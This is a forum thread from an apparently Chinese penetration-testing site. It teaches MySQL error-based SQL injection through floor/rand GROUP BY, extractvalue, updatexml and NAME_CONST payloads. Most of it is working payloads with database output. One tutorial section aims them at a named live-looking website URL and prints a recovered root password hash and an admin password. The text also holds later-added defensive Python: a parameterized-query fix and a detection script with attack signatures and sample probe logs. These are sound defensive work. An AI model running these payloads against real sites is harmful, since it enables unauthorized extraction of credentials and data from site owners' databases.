中国网络渗透测试联盟

Title: MySQL error-based injection: exploiting the three error modes floor, ExtractValue and UpdateXml

Author: admin    Time: 2015-11-11 19:03

1. Error via floor()

Payloads such as the following can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Both rely on the same MySQL behaviour: rand(0) is seeded, so floor(rand(0)*2) yields a repeatable 0/1 sequence, and because GROUP BY re-evaluates the key expression when it inserts a new row into its temporary table, the same key is produced twice and MySQL raises a duplicate-entry error that quotes the key, including whatever was concatenated into it. The FROM clause needs at least three rows for this to happen, which information_schema.tables or the three-row UNION in the second payload provides.

An example. First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id input is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To retrieve other data, replace version() with the subquery whose result you want.
For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

(The trailing 1 in 'admin8881' is the floor(rand(0)*2) digit that concat() appended; the password itself is admin888.)

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

Both functions parse their second argument as an XPath expression. The 0x5c (backslash) or 0x3a (colon) prefix makes that expression invalid, so MySQL rejects it and echoes the string, subquery result included, in the error message.
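All three techniques above start from the same defect: the article id taken from the request is spliced into the SQL text. The script below is an added illustration, not code from the original post; it uses SQLite in memory as a stand-in for MySQL (so it cannot reproduce the extractvalue() error itself) and constructs its own `article` and `admin` rows. What it shows is that the same payload is parsed as SQL by the concatenating version and treated as an ordinary value by the parameterized one.

```python
"""Added example: why the `id` parameter is injectable, and the fix.

Not code from the original post. SQLite (in memory) stands in for MySQL
here; it lacks extractvalue()/updatexml(), so the concatenated query fails
with "no such function" instead of leaking data, but that failure is the
point: the injected text reached the SQL parser as code. The parameterized
version treats the same text as a value and simply matches no row.
"""
import sqlite3

# Constructed payload: the ExtractValue probe from the thread, as it would
# arrive in the `id` query-string parameter.
PAYLOAD = "1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))"


def setup() -> sqlite3.Connection:
    """Build the `article` and `admin` tables from the thread with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, content TEXT);
        INSERT INTO article VALUES (1, 'test', 'do it');
        CREATE TABLE admin (id INTEGER PRIMARY KEY, pass TEXT);
        INSERT INTO admin VALUES (1, 'admin888');
        """
    )
    return conn


def fetch_article_vulnerable(conn: sqlite3.Connection, user_input: str) -> list:
    """The defect: the request parameter becomes part of the SQL text."""
    sql = "SELECT id, title FROM article WHERE id = " + user_input
    return conn.execute(sql).fetchall()


def fetch_article_safe(conn: sqlite3.Connection, user_input: str) -> list:
    """The fix: a placeholder. The driver passes the value separately from
    the statement, so no part of it can change the query's structure."""
    sql = "SELECT id, title FROM article WHERE id = ?"
    return conn.execute(sql, (user_input,)).fetchall()


def compare(conn: sqlite3.Connection, user_input: str) -> dict:
    """Run both code paths on one input and report how each treated it."""
    report = {}
    try:
        rows = fetch_article_vulnerable(conn, user_input)
        report["vulnerable"] = f"executed, {len(rows)} row(s)"
    except sqlite3.OperationalError as exc:
        # The parser saw extractvalue( as a function call, i.e. the input was
        # interpreted as SQL. On MySQL this is exactly where the error-based
        # leak would occur; SQLite reports the unknown function instead.
        report["vulnerable"] = f"parsed as SQL: {exc}"
    rows = fetch_article_safe(conn, user_input)
    report["safe"] = f"executed, {len(rows)} row(s)"
    return report


if __name__ == "__main__":
    db = setup()
    for value in ("1", PAYLOAD):
        print(repr(value), "->", compare(db, value))
```

Binding the parameter is the fix that removes the whole class of error-based probes; casting `id` to an integer before the query is a worthwhile second layer, and the database error text should never be echoed to the client, since every technique in this thread depends on reading it.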

More collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the NAME_CONST method. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
|------|
| TEST |
|------|
|    1 |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

The trick is that both NAME_CONST() calls name their column after the value of VAR, so the derived table x ends up with two columns of the same name; MySQL rejects that with a "Duplicate column name" error, and the name it prints is the variable's value.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out of this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'..

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
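Every technique in this thread (floor/rand with GROUP BY, extractvalue, updatexml, the doubled NAME_CONST) leaves two traces a defender can look for: the probe in the request's query string and the raw MySQL error in the response. The script below is an added example, not part of the original post; the access-log lines and the host/path in them are constructed placeholders, and the probes in them are the ones quoted above. It normalizes each request (URL-decoding, '+' to space, case folding), matches it against one rule per technique, and separately flags response bodies that carry the error strings shown in the thread.

```python
"""Added example: spotting the error-based probes from this thread in an
access log, and MySQL error leakage in responses. Not code from the
original post; log lines below are constructed with placeholder host/paths.
"""
import re
from urllib.parse import unquote_plus

# One rule per technique in the thread, matched against the decoded,
# lower-cased query string. The floor rule needs both halves of the trick
# (floor(rand( and group by) to be present, in either order.
RULES = [
    ("floor_group_by", re.compile(r"(?=.*floor\s*\(\s*rand\s*\()(?=.*group\s+by)", re.S)),
    ("extractvalue",   re.compile(r"\bextractvalue\s*\(")),
    ("updatexml",      re.compile(r"\bupdatexml\s*\(")),
    ("name_const",     re.compile(r"\bname_const\s*\(.*\bname_const\s*\(", re.S)),
]

# Raw MySQL error text that should never reach an HTTP client; each pattern
# is the message family quoted in the thread for that technique.
LEAK_PATTERNS = [
    re.compile(r"Duplicate entry '.*' for key 'group_key'"),
    re.compile(r"XPATH syntax error: '"),
    re.compile(r"Duplicate column name '"),
]

# Request line of a Common Log Format entry; the query part is optional.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>[^?\s]+)(?:\?(?P<query>\S*))? HTTP/')


def decode_query(query: str) -> str:
    """Decode twice (double encoding is common), '+' to space, fold case."""
    return unquote_plus(unquote_plus(query or "")).lower()


def classify_request(line: str) -> list:
    """Return the names of the rules that fire on one access-log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    decoded = decode_query(m.group("query"))
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(lines) -> dict:
    """Map the index of each suspicious line to the rules that fired."""
    hits = {}
    for i, line in enumerate(lines):
        names = classify_request(line)
        if names:
            hits[i] = names
    return hits


def response_leaks(body: str) -> bool:
    """True if an HTTP response body contains a raw MySQL error message."""
    return any(p.search(body) for p in LEAK_PATTERNS)


# Constructed sample log: one benign request, then one probe per technique.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Nov/2015:19:03:00 +0800] "GET /content/detail.php?id=330&sid=19 HTTP/1.1" 200 4821',
    '203.0.113.5 - - [11/Nov/2015:19:03:01 +0800] "GET /content/detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 212',
    '203.0.113.5 - - [11/Nov/2015:19:03:02 +0800] "GET /content/detail.php?id=1+and+extractvalue(1,concat(0x5c,(select+table_name+from+information_schema.tables+limit+1))) HTTP/1.1" 500 198',
    '203.0.113.5 - - [11/Nov/2015:19:03:03 +0800] "GET /content/detail.php?id=1+and+1%3D(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1" 500 190',
    '203.0.113.5 - - [11/Nov/2015:19:03:04 +0800] "GET /content/detail.php?id=330+and+1%3D(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 201',
]

if __name__ == "__main__":
    for idx, names in scan_log(SAMPLE_LOG).items():
        print(idx, names)
```

The request-side rules are signatures and will miss obfuscated variants (comments inside keywords, alternative encodings), so treat them as a starting point; the response-side check is the more robust of the two, because a leaked "Duplicate entry", "XPATH syntax error" or "Duplicate column name" message in a page body is wrong regardless of how the probe was spelled, and the same check can be run over the application's own error logs.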





Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2